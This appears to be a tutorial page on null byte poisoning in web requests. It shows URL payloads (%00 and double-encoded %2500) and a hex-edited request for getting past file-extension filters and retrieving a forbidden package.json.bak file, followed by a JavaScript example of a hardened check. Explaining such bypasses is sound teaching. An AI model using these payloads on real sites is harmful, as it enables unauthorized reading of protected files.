Null Byte Poisoning

Null byte poisoning is used to bypass input filtering or validation mechanisms in web applications or other systems. It involves inserting a null byte, either URL-encoded (%00) or in hexadecimal (\x00), to terminate a string early.

  • We requested a resource from a site, but it returns a 403 (Forbidden) error. The site tells us that only certain file types or extensions may be requested

http://$url/package.json.bak

  • We can bypass the check by appending a null byte followed by an extension the site allows. The validation passes because the string ends in an allowed extension, but internally, when the file is looked up, the null byte terminates the string, so the desired file is returned

http://$url/package.json.bak%00.$extension

  • If this doesn't work, we can URL-encode the % itself, which is represented as %25

http://$url/package.json.bak%2500.$extension

  • It is also possible to get this result by modifying the hex data of the request and inserting a null byte (00) at the corresponding position

00000000  68 74 74 70  3A 2F 2F 24   75 72 6C 2F  70 61 63 6B   http://$url/pack
00000010  61 67 65 2E  6A 73 6F 6E   2E 62 61 6B  00 2E 24 65   age.json.bakA.$e
00000020  78 74 65 6E  73 69 6F 6E   0A                         xtension.  

In this case, we replace the A that we put in as a placeholder with the 00 byte (the hex column above already shows 00, while the text column still shows the A).
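The mismatch described above, between a filter that looks at the end of the name and a lookup that stops at the null byte, is shown below next to a hardened check. This is an added example, not code from the original page; the allowlist, the function names and the model of the file lookup are assumptions for illustration.

```javascript
// Added example: all names and the ALLOWED list are assumptions for illustration.
const ALLOWED = new Set(['.md', '.pdf']);

const extOf = (name) => {
  const i = name.lastIndexOf('.');
  return i === -1 ? '' : name.slice(i).toLowerCase();
};

// Weak filter: decodes once and only looks at how the name ends.
function weakCheck(rawName) {
  return ALLOWED.has(extOf(decodeURIComponent(rawName)));
}

// Model of a lower layer that decodes again and stops at NUL,
// as a C-string based file API would.
function nameSeenByLookup(rawName) {
  let name = decodeURIComponent(rawName);
  try { name = decodeURIComponent(name); } catch (_) { /* keep single-decoded name */ }
  const nul = name.indexOf('\0');
  return nul === -1 ? name : name.slice(0, nul);
}

// Hardened check: decode once, refuse anything a later layer could read
// differently, then validate the exact string handed to the file lookup.
function strictCheck(rawName) {
  let name;
  try { name = decodeURIComponent(rawName); }
  catch (_) { return { ok: false, reason: 'malformed encoding' }; }
  if (/[\x00-\x1f\x7f]/.test(name)) return { ok: false, reason: 'control or null byte' };
  if (/%[0-9a-f]{2}/i.test(name)) return { ok: false, reason: 'nested percent-encoding' };
  if (/[\/\\]|\.\./.test(name)) return { ok: false, reason: 'path traversal characters' };
  if (!ALLOWED.has(extOf(name))) return { ok: false, reason: 'extension not allowed' };
  return { ok: true, name };
}

// Constructed sample file names (the last two are the forms shown above).
const SAMPLES = ['legal.md', 'package.json.bak', 'package.json.bak%00.md', 'package.json.bak%2500.md'];

function compare() {
  return SAMPLES.map((raw) => ({
    raw, weak: weakCheck(raw), lookup: nameSeenByLookup(raw), strict: strictCheck(raw),
  }));
}

console.table(compare().map((r) => ({ ...r, strict: r.strict.ok ? 'ok' : r.strict.reason })));
```

For the last two samples the weak filter passes while the lookup resolves `package.json.bak`; the strict check rejects both and only ever returns the same string it validated.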
